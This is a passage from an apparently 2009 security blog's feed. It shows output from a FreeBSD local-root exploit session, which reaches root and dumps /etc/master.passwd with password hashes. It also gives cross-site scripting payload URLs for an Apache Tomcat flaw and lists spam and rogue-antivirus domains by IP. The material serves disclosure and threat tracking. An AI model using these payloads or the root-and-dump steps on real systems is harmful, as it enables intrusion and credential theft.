session&lt;/div&gt;&lt;div&gt;**********************************&lt;/div&gt;&lt;div&gt;%uname -a;id;&lt;/div&gt;&lt;div&gt;FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21&lt;/div&gt;&lt;div&gt;15:48:17 UTC 2009&lt;/div&gt;&lt;div&gt;root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC  i386&lt;/div&gt;&lt;div&gt;uid=1001(kcope) gid=1001(users) groups=1001(users)&lt;/div&gt;&lt;div&gt;%./w00t.sh&lt;/div&gt;&lt;div&gt;FreeBSD local r00t zeroday&lt;/div&gt;&lt;div&gt;by Kingcope&lt;/div&gt;&lt;div&gt;November 2009&lt;/div&gt;&lt;div&gt;env.c: In function 'main':&lt;/div&gt;&lt;div&gt;env.c:5: warning: incompatible implicit declaration of built-in&lt;/div&gt;&lt;div&gt;function 'malloc'&lt;/div&gt;&lt;div&gt;env.c:9: warning: incompatible implicit declaration of built-in&lt;/div&gt;&lt;div&gt;function 'strcpy'&lt;/div&gt;&lt;div&gt;env.c:11: warning: incompatible implicit declaration of built-in&lt;/div&gt;&lt;div&gt;function 'execl'&lt;/div&gt;&lt;div&gt;/libexec/ld-elf.so.1: environment corrupt; missing value for&lt;/div&gt;&lt;div&gt;/libexec/ld-elf.so.1: environment corrupt; missing value for&lt;/div&gt;&lt;div&gt;/libexec/ld-elf.so.1: environment corrupt; missing value for&lt;/div&gt;&lt;div&gt;/libexec/ld-elf.so.1: environment corrupt; missing value for&lt;/div&gt;&lt;div&gt;/libexec/ld-elf.so.1: environment corrupt; missing value for&lt;/div&gt;&lt;div&gt;/libexec/ld-elf.so.1: environment corrupt; missing value for&lt;/div&gt;&lt;div&gt;ALEX-ALEX&lt;/div&gt;&lt;div&gt;# uname -a;id;&lt;/div&gt;&lt;div&gt;FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21&lt;/div&gt;&lt;div&gt;15:48:17 UTC 2009&lt;/div&gt;&lt;div&gt;root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC  i386&lt;/div&gt;&lt;div&gt;uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)&lt;/div&gt;&lt;div&gt;# cat /etc/master.passwd&lt;/div&gt;&lt;div&gt;# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29&lt;/div&gt;&lt;div&gt;kensmith Exp $&lt;/div&gt;&lt;div&gt;#&lt;/div&gt;&lt;div&gt;root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie &amp;amp;:/root:/bin/csh&lt;/div&gt;&lt;div&gt;toor:*:0:0::0:0:Bourne-again Superuser:/root:&lt;/div&gt;&lt;div&gt;daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin&lt;/div&gt;&lt;div&gt;operator:*:2:5::0:0:System &amp;amp;:/:/usr/sbin/nologin&lt;/div&gt;&lt;div&gt;bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin&lt;/div&gt;&lt;div&gt;tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin&lt;/div&gt;&lt;div&gt;kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin&lt;/div&gt;&lt;div&gt;games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin&lt;/div&gt;&lt;div&gt;news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin&lt;/div&gt;&lt;div&gt;man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin&lt;/div&gt;&lt;div&gt;sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin&lt;/div&gt;&lt;div&gt;smmsp:*:25:25::0:0:Sendmail Submission&lt;/div&gt;&lt;div&gt;User:/var/spool/clientmqueue:/usr/sbin/nologin&lt;/div&gt;&lt;div&gt;mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin&lt;/div&gt;&lt;div&gt;bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin&lt;/div&gt;&lt;div&gt;proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin&lt;/div&gt;&lt;div&gt;_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin&lt;/div&gt;&lt;div&gt;_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin&lt;/div&gt;&lt;div&gt;uucp:*:66:66::0:0:UUCP&lt;/div&gt;&lt;div&gt;pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico&lt;/div&gt;&lt;div&gt;pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin&lt;/div&gt;&lt;div&gt;www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin&lt;/div&gt;&lt;div&gt;nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin&lt;/div&gt;&lt;div&gt;kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User&lt;/div&gt;&lt;div&gt;&amp;amp;:/home/kcope:/bin/sh&lt;/div&gt;&lt;div&gt;#&lt;/div&gt;&lt;div&gt;&lt;div&gt;Systems tested/affected&lt;/div&gt;&lt;div&gt;**********************************&lt;/div&gt;&lt;div&gt;FreeBSD 8.0-RELEASE *** VULNERABLE&lt;/div&gt;&lt;div&gt;FreeBSD 7.1-RELEASE *** VULNERABLE&lt;/div&gt;&lt;div&gt;FreeBSD 6.3-RELEASE *** NOT VULN&lt;/div&gt;&lt;div&gt;FreeBSD 4.9-RELEASE *** NOT VULN&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;*EXPLOIT*&lt;/div&gt;&lt;div&gt;&lt;a href="http://seclists.org/fulldisclosure/2009/Nov/371"&gt;http://seclists.org/fulldisclosure/2009/Nov/371&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-5335616297351237205?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/e1OzQGnhWY2H2DLtyeo3T55mAj8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/e1OzQGnhWY2H2DLtyeo3T55mAj8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/e1OzQGnhWY2H2DLtyeo3T55mAj8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/e1OzQGnhWY2H2DLtyeo3T55mAj8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/5335616297351237205/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=5335616297351237205" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/5335616297351237205?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/5335616297351237205?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/eDWAf0qCWgk/freebsd-local-r00t-zeroday.html" title="FreeBSD local r00t zeroday" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2009/12/freebsd-local-r00t-zeroday.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkcGRXs6eip7ImA9WxNaGUg.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-3534158679223916847</id><published>2009-12-04T09:41:00.000-08:00</published><updated>2009-12-04T10:07:04.512-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-04T10:07:04.512-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Web Security" /><category scheme="http://www.blogger.com/atom/ns#" term="spam" /><title>Spam **05-Dec</title><content type="html">&lt;div&gt;IP Address: &lt;b&gt;82.204.219.218&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;*.live.smtp.ru&lt;/div&gt;&lt;div&gt;*.michael.smtp.ru&lt;/div&gt;&lt;div&gt;*.msn.live.smtp.ru&lt;/div&gt;&lt;div&gt;*.my-yahoo-register.smtp.ru&lt;/div&gt;&lt;div&gt;*.ndgcx2zh2.smtp.ru&lt;/div&gt;&lt;div&gt;*.olhardigital.smtp.ru&lt;/div&gt;&lt;div&gt;*.smtp.ru&lt;/div&gt;&lt;div&gt;*.system.smtp.ru&lt;/div&gt;&lt;div&gt;*.uk.smtp.ru&lt;/div&gt;&lt;div&gt;*.working.smtp.ru&lt;/div&gt;&lt;div&gt;2a.smtp.ru&lt;/div&gt;&lt;div&gt;accedipostaitalienesslttpacceso.smtp.ru&lt;/div&gt;&lt;div&gt;altenativo2010.smtp.ru&lt;/div&gt;&lt;div&gt;anjodoamor2007.smtp.ru&lt;/div&gt;&lt;div&gt;beatrisadoyy.smtp.ru&lt;/div&gt;&lt;div&gt;blog-fotos-amanda.smtp.ru&lt;/div&gt;&lt;div&gt;blogger1.smtp.ru&lt;/div&gt;&lt;div&gt;cap1.smtp.ru&lt;/div&gt;&lt;div&gt;cocoleg.smtp.ru&lt;/div&gt;&lt;div&gt;computing.system.smtp.ru&lt;/div&gt;&lt;div&gt;finasa.smtp.ru&lt;/div&gt;&lt;div&gt;ftp2.smtp.ru&lt;/div&gt;&lt;div&gt;hsbc.uk.smtp.ru&lt;/div&gt;&lt;div&gt;hussein.working.smtp.ru&lt;/div&gt;&lt;div&gt;kalamazu2008.smtp.ru&lt;/div&gt;&lt;div&gt;lembrancas.michael.smtp.ru&lt;/div&gt;&lt;div&gt;live.smtp.ru&lt;/div&gt;&lt;div&gt;michael.smtp.ru&lt;/div&gt;&lt;div&gt;mikle.smtp.ru&lt;/div&gt;&lt;div&gt;msgss.smtp.ru&lt;/div&gt;&lt;div&gt;msn.live.smtp.ru&lt;/div&gt;&lt;div&gt;my-yahoo-register.smtp.ru&lt;/div&gt;&lt;div&gt;ndgcx2zh2.smtp.ru&lt;/div&gt;&lt;div&gt;node2.mk.pochta.ru&lt;/div&gt;&lt;div&gt;olhardigital.smtp.ru&lt;/div&gt;&lt;div&gt;pozesursa1.smtp.ru&lt;/div&gt;&lt;div&gt;ssl1.smtp.ru&lt;/div&gt;&lt;div&gt;system.smtp.ru&lt;/div&gt;&lt;div&gt;testing.smtp.ru&lt;/div&gt;&lt;div&gt;uk.smtp.ru&lt;/div&gt;&lt;div&gt;vida.smtp.ru&lt;/div&gt;&lt;div&gt;working.smtp.ru&lt;/div&gt;&lt;div&gt;www.altenativo2010.smtp.ru&lt;/div&gt;&lt;div&gt;www.blog-fotos-amanda.smtp.ru&lt;/div&gt;&lt;div&gt;www.finasa.smtp.ru&lt;/div&gt;&lt;div&gt;www.hsbc.uk.smtp.ru&lt;/div&gt;&lt;div&gt;www.msn.live.smtp.ru&lt;/div&gt;&lt;div&gt;www.my-yahoo-register.smtp.ru&lt;/div&gt;&lt;div&gt;www.ndgcx2zh2.smtp.ru&lt;/div&gt;&lt;div&gt;www.olhardigital.smtp.ru&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;IP Address: &lt;b&gt;64.62.181.43&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;*.fileave.com&lt;/div&gt;&lt;div&gt;2a.fileave.com&lt;/div&gt;&lt;div&gt;badkiddies.fileave.com&lt;/div&gt;&lt;div&gt;bandaeva.fileave.com&lt;/div&gt;&lt;div&gt;binuser.fileave.com&lt;/div&gt;&lt;div&gt;camimura.fileave.com&lt;/div&gt;&lt;div&gt;casinhabranca.fileave.com&lt;/div&gt;&lt;div&gt;contempt.fileave.com&lt;/div&gt;&lt;div&gt;ericschevy.fileave.com&lt;/div&gt;&lt;div&gt;finkel.fileave.com&lt;/div&gt;&lt;div&gt;googlevideo.fileave.com&lt;/div&gt;&lt;div&gt;gtemplates.fileave.com&lt;/div&gt;&lt;div&gt;ovhsux.fileave.com&lt;/div&gt;&lt;div&gt;scn2.fileave.com&lt;/div&gt;&lt;div&gt;tikam.fileave.com&lt;/div&gt;&lt;div&gt;trustha.fileave.com&lt;/div&gt;&lt;div&gt;vembebe.fileave.com&lt;/div&gt;&lt;div&gt;xscan.fileave.com&lt;/div&gt;&lt;div&gt;zenka.fileave.com&lt;/div&gt;&lt;div&gt;zzzz.fileave.com&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;IP Address: &lt;b&gt;217.116.46.139&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;*.auszer.hu&lt;/div&gt;&lt;div&gt;*.egylap.hu&lt;/div&gt;&lt;div&gt;*.mail.webmester.net&lt;/div&gt;&lt;div&gt;*.webmester.net&lt;/div&gt;&lt;div&gt;auszer.hu&lt;/div&gt;&lt;div&gt;auto-tuning.hu&lt;/div&gt;&lt;div&gt;boltmix.com&lt;/div&gt;&lt;div&gt;csofek.hu&lt;/div&gt;&lt;div&gt;duoeotvos.com&lt;/div&gt;&lt;div&gt;egylap.hu&lt;/div&gt;&lt;div&gt;hirdet.info&lt;/div&gt;&lt;div&gt;hirdet.net&lt;/div&gt;&lt;div&gt;kezdo.net&lt;/div&gt;&lt;div&gt;kontaktspray.com&lt;/div&gt;&lt;div&gt;kontaktspray.hu&lt;/div&gt;&lt;div&gt;kpeg.hu&lt;/div&gt;&lt;div&gt;lakeinvest.hu&lt;/div&gt;&lt;div&gt;mail.auszer.hu&lt;/div&gt;&lt;div&gt;mail.auto-tuning.hu&lt;/div&gt;&lt;div&gt;mail.csofek.hu&lt;/div&gt;&lt;div&gt;mail.egylap.hu&lt;/div&gt;&lt;div&gt;mail.kemence.net&lt;/div&gt;&lt;div&gt;mail.kpeg.hu&lt;/div&gt;&lt;div&gt;mail.nevjegytar.hu&lt;/div&gt;&lt;div&gt;mail.oxalis.hu&lt;/div&gt;&lt;div&gt;mail.relaxinfra.hu&lt;/div&gt;&lt;div&gt;mail.rudasy.hu&lt;/div&gt;&lt;div&gt;mail.vicc.net&lt;/div&gt;&lt;div&gt;mail.webmester.net&lt;/div&gt;&lt;div&gt;motobatt.info&lt;/div&gt;&lt;div&gt;motor-akku.hu&lt;/div&gt;&lt;div&gt;nevjegytar.hu&lt;/div&gt;&lt;div&gt;ns2.webmester.net&lt;/div&gt;&lt;div&gt;ns3.webmester.net&lt;/div&gt;&lt;div&gt;oxalis.hu&lt;/div&gt;&lt;div&gt;proelektro.info&lt;/div&gt;&lt;div&gt;relaxinfra.hu&lt;/div&gt;&lt;div&gt;root.mail.webmester.net&lt;/div&gt;&lt;div&gt;root.webmester.net&lt;/div&gt;&lt;div&gt;rudasy.hu&lt;/div&gt;&lt;div&gt;tokol.net&lt;/div&gt;&lt;div&gt;tokoliuszoda.hu&lt;/div&gt;&lt;div&gt;vicc.net&lt;/div&gt;&lt;div&gt;webmester.net&lt;/div&gt;&lt;div&gt;wiha.info&lt;/div&gt;&lt;div&gt;www.vicc.net&lt;/div&gt;&lt;div&gt;www.webmester.net&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;IP Address: &lt;b&gt;218.93.205.19&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;*.guarddog2009.com&lt;/div&gt;&lt;div&gt;brans.pl&lt;/div&gt;&lt;div&gt;dl.guarddog2009.com&lt;/div&gt;&lt;div&gt;guarddog2009.com&lt;/div&gt;&lt;div&gt;root.guarddog2009.com&lt;/div&gt;&lt;div&gt;www.brans.pl&lt;/div&gt;&lt;div&gt;www.guarddog2009.com&lt;/div&gt;&lt;div&gt;www.zief.pl&lt;/div&gt;&lt;div&gt;zief.pl&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-3534158679223916847?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/rNPSp6Cjr8Keb5oyHoYG1jxFw8U/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/rNPSp6Cjr8Keb5oyHoYG1jxFw8U/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/rNPSp6Cjr8Keb5oyHoYG1jxFw8U/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/rNPSp6Cjr8Keb5oyHoYG1jxFw8U/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/3534158679223916847/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=3534158679223916847" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/3534158679223916847?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/3534158679223916847?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/8YHdLxRB7pc/spam-05-dec.html" title="Spam **05-Dec" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2009/12/spam-05-dec.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0YMQ3c5cSp7ImA9WxNaF0s.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-8239218431466902939</id><published>2009-12-02T07:50:00.000-08:00</published><updated>2009-12-02T07:53:02.929-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-02T07:53:02.929-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Web Security" /><category scheme="http://www.blogger.com/atom/ns#" term="Apache" /><title>Apache Tomcat 404 error Vulnerability</title><content type="html">Reference: &lt;a href="http://websecurity.com.ua/3114"&gt;http://websecurity.com.ua/3114&lt;/a&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Vulnerable:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;Apache Software Foundation Tomcat 3.2.1&lt;/div&gt;&lt;div&gt;Apache Software Foundation Tomcat 3.2&lt;/div&gt;&lt;div&gt;Apache Software Foundation Tomcat 3.1.1&lt;/div&gt;&lt;div&gt;Apache Software Foundation Tomcat 3.1&lt;/div&gt;&lt;div&gt;Apache Software Foundation Tomcat 3.0&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Exploit:&lt;/div&gt;&lt;div&gt;&lt;pre&gt;http://www.example.com/?offset=1&amp;amp;cid=1&amp;amp;limit=%3Cscript%3Ealert(document.cookie)%3C/script%3E&lt;/pre&gt;&lt;pre&gt;http://www.example.com/?offset=1&amp;amp;cid=%3Cscript%3Ealert(document.cookie)%3C/script%3E&lt;/pre&gt;&lt;pre&gt;http://www.example.com/?offset=%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp;amp;cid=1&lt;/pre&gt;&lt;pre&gt;&lt;span class="Apple-style-span"  style="font-family:Georgia, serif;"&gt;&lt;span class="Apple-style-span" style="white-space: normal; font-size: -webkit-xxx-large;"&gt;&lt;span class="Apple-style-span"   style="font-family:monospace;font-size:100%;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px; white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-family: Georgia, serif; white-space: normal; font-size: 16px; "&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre&gt;&lt;span class="Apple-style-span"  style="font-family:Georgia, serif;"&gt;&lt;span class="Apple-style-span" style="white-space: normal; font-size: -webkit-xxx-large;"&gt;&lt;span class="Apple-style-span"   style="font-family:monospace;font-size:100%;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px; white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-family: Georgia, serif; white-space: normal; font-size: 16px; "&gt;Reference: &lt;a href="http://websecurity.com.ua/3114"&gt;http://websecurity.com.ua/3114&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-8239218431466902939?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/e1aCtSourKVWGL9wETqvLhPqBPg/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/e1aCtSourKVWGL9wETqvLhPqBPg/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/e1aCtSourKVWGL9wETqvLhPqBPg/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/e1aCtSourKVWGL9wETqvLhPqBPg/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/8239218431466902939/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=8239218431466902939" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/8239218431466902939?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/8239218431466902939?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/X306dFAW4CU/apache-tomcat-404-error-vulnerability.html" title="Apache Tomcat 404 error Vulnerability" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2009/12/apache-tomcat-404-error-vulnerability.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0IFSHo_eSp7ImA9WxNaE04.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-2579819762662120694</id><published>2009-11-27T06:16:00.000-08:00</published><updated>2009-11-27T06:18:39.441-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-11-27T06:18:39.441-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="rogue" /><category scheme="http://www.blogger.com/atom/ns#" term="Web Security" /><category scheme="http://www.blogger.com/atom/ns#" term="Bogus" /><category scheme="http://www.blogger.com/atom/ns#" term="antivirus" /><title>Rogue Antivirus ** 27-Nov</title><content type="html">&lt;div&gt;IP Address: &lt;b&gt;91.207.116.55&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;10-open-davinci.com&lt;/div&gt;&lt;div&gt;advanced-virus-remover2010.com&lt;/div&gt;&lt;div&gt;advanced-virusremover-2009.com&lt;/div&gt;&lt;div&gt;advanced-virusremover-2010.com&lt;/div&gt;&lt;div&gt;advancedvirus-remover-2010.com&lt;/div&gt;&lt;div&gt;advancedvirusremover-2009.com&lt;/div&gt;&lt;div&gt;best-scan-pc.biz&lt;/div&gt;&lt;div&gt;best-scan-pc.com&lt;/div&gt;&lt;div&gt;best-scan-pc.net&lt;/div&gt;&lt;div&gt;best-scan.com&lt;/div&gt;&lt;div&gt;best-scan.net&lt;/div&gt;&lt;div&gt;best-scanpc.com&lt;/div&gt;&lt;div&gt;best-scanpc.net&lt;/div&gt;&lt;div&gt;best-scanpc.org&lt;/div&gt;&lt;div&gt;cathrynzfunz.com&lt;/div&gt;&lt;div&gt;coolcount1.com&lt;/div&gt;&lt;div&gt;downloadavr6.com&lt;/div&gt;&lt;div&gt;downloadavr7.com&lt;/div&gt;&lt;div&gt;downloadavr8.com&lt;/div&gt;&lt;div&gt;greatcrypt.com&lt;/div&gt;&lt;div&gt;hard-xxx-tube.com&lt;/div&gt;&lt;div&gt;mail.10-open-davinci.com&lt;/div&gt;&lt;div&gt;mail.advanced-virus-remover-2009.com&lt;/div&gt;&lt;div&gt;mail.advanced-virus-remover2010.com&lt;/div&gt;&lt;div&gt;mail.advanced-virusremover-2010.com&lt;/div&gt;&lt;div&gt;mail.advanced-virusremover2009.com&lt;/div&gt;&lt;div&gt;mail.advancedvirus-remover-2010.com&lt;/div&gt;&lt;div&gt;mail.advancedvirusremover-2009.com&lt;/div&gt;&lt;div&gt;mail.best-scan-pc.com&lt;/div&gt;&lt;div&gt;mail.best-scan-pc.net&lt;/div&gt;&lt;div&gt;mail.best-scan.com&lt;/div&gt;&lt;div&gt;mail.best-scan.net&lt;/div&gt;&lt;div&gt;mail.best-scanpc.org&lt;/div&gt;&lt;div&gt;mail.cathrynzfunz.com&lt;/div&gt;&lt;div&gt;mail.coolcount1.com&lt;/div&gt;&lt;div&gt;mail.downloadavr6.com&lt;/div&gt;&lt;div&gt;mail.downloadavr7.com&lt;/div&gt;&lt;div&gt;mail.downloadavr8.com&lt;/div&gt;&lt;div&gt;mail.greatcrypt.com&lt;/div&gt;&lt;div&gt;mail.hard-xxx-tube.com&lt;/div&gt;&lt;div&gt;mail.testavrdown.com&lt;/div&gt;&lt;div&gt;mail.testavrdownnew.com&lt;/div&gt;&lt;div&gt;mail.vscodec-pro.net&lt;/div&gt;&lt;div&gt;mail.vsproject.net&lt;/div&gt;&lt;div&gt;mail.xxx-white-tube.net&lt;/div&gt;&lt;div&gt;mail.xxx-white-tube.org&lt;/div&gt;&lt;div&gt;testavrdown.com&lt;/div&gt;&lt;div&gt;testavrdownnew.com&lt;/div&gt;&lt;div&gt;vscodec-pro.net&lt;/div&gt;&lt;div&gt;white-xxx-tube.com&lt;/div&gt;&lt;div&gt;www.advancedvirus-remover2009.com&lt;/div&gt;&lt;div&gt;www.advancedvirusremover-2009.com&lt;/div&gt;&lt;div&gt;www.best-scan-pc.com&lt;/div&gt;&lt;div&gt;www.best-scanpc.net&lt;/div&gt;&lt;div&gt;www.best-scanpc.org&lt;/div&gt;&lt;div&gt;www.hard-xxx-tube.com&lt;/div&gt;&lt;div&gt;www.onlinescanxppro.com&lt;/div&gt;&lt;div&gt;xxx-white-tube.org&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;IP Address: &lt;b&gt;87.98.254.201&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;fastzonescan-now.com&lt;/div&gt;&lt;div&gt;systemprotection-zone.com&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;IP Address: &lt;b&gt;88.198.239.161&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;my-protectedzone.net&lt;/div&gt;&lt;div&gt;static.88-198-239-161.clients.your-server.de&lt;/div&gt;&lt;div&gt;todozone-guard.com&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;IP Address: &lt;b&gt;93.174.95.135&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br 